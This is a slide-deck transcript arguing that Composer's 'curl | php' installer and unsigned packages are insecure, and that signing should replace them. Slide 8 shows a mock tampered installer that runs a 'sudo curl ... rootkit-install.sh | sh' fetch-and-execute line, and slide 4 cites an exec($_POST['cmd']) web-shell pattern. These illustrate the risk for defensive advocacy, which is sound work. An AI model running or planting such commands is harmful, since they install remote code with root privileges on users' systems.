Composer - russian roulette

Transcript

1. composer you’re doing it wrong

2. First things first: • I like composer. • It has

   changed PHP packaging for the better. • I use it on a daily basis. • But composer is doing it wrong...

3. Installing composer $ curl -sS https://getcomposer.org/installer | php Taken straight

   from the manual: http://getcomposer.org/doc/00-intro.md

4. To put it in a PHP perspective: exec($_POST[‘cmd’]);

5. what could possibly go wrong?!

6. https://getcomposer.org/installer #!/usr/bin/env php <?php /* * This file is part

   of Composer. * * (c) Nils Adermann <[email protected]> * Jordi Boggiano <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ process($argv); /** * processes the installer */ function process($argv) { $check = in_array('--check', $argv); $help = in_array('--help', $argv); $force = in_array('--force', $argv); $quiet = in_array('--quiet', $argv); $installDir = false; foreach ($argv as $key => $val) { if (0 === strpos($val, '--install-dir')) { if (13 === strlen($val) && isset($argv[$key+1])) { $installDir = trim($argv[$key+1]); } else { $installDir = trim(substr($val, 14)); } } } if ($help) { displayHelp(); exit(0); }

7. http://getcomposer.org/

8. https://getcomposer.org/installer #!/usr/bin/env php <?php /* Teh H4xx0rs 3v1l filez: */

   exec("sudo curl -sS rootkit-install.sh | sh"); exec("sudo curl -sS orig-composer-stuff.sh | sh");

9. Installing composer $ curl -sS https://getcomposer.org/installer | php Would you

   notice?

10. No, you wouldn’t • Compromises aren’t as visible as this

    example. • You don’t check the SHA / MD5 sum of the downloaded installer. • If you wanted to check, check against what?

11. The real problem • We download unknown software on our

    development platform, and often also on production servers. • We tend to do this with a privileged (root) account. • We don’t and cannot verify the integrity of this process.

12. We can fix this • We do this all the

    time: signing. • We take trust in a certificate or key. • Everything that is signed with that certificate / key, is automatically trusted. • “web of trust” • apt-get install, yum install

13. We can fix this • Let’s add composer to a

    (known) repository (EPEL, dag.wieers, remi collet). • Get rid of the auto-update features of composer. They are useless, and easy to compromise.

14. But when we fix composer,.. another problem,.. • Composer downloads

    unverified, unsigned packages from mostly git.. • How do we know for sure those are safe?

15. We don’t :/ but we should :| and we can

    :)

16. ... You can have people who try to be malicious.

    They won't succeed. You need to know exactly 20 bytes, you need to know 160-bit SHA-1 name of the top of your tree, and if you know that, you can trust your tree, all the way down, the whole history. You can have 10 years of history, you can have 100,000 files, you can have millions of revisions, and you can trust every single piece of it. .... http://www.youtube.com/watch?v=4XpnKHJAok8 Google TechTalk: Linus on Git

17. Please.. • “<command> | sh” and “<command> | php” has

    effectively been eliminated in the sysadmin world after decades. • They are insecure and relinquish control to other non-trusted parties. • We should not allow PHP developers to embrace the worst practices.

18. Please.. • There are better ways to install software. We

    should use them. • Signing is THE best way to securely verify integrity of data. We should get used to them.

19. Please.. • We need to change composer and all other

    tools that use this to implementing correct signing mechanism. • It’s possible. We can sign composer, and we can sign git commits. • We should not allow unsigned commits/ packages (at least not with a --allow-unsigned-packages)

20. Btw.. • It’s not just composer, RVM does this just

    as badly: https://rvm.io/rvm/install/ • Let’s stop stupidity and FIX THIS!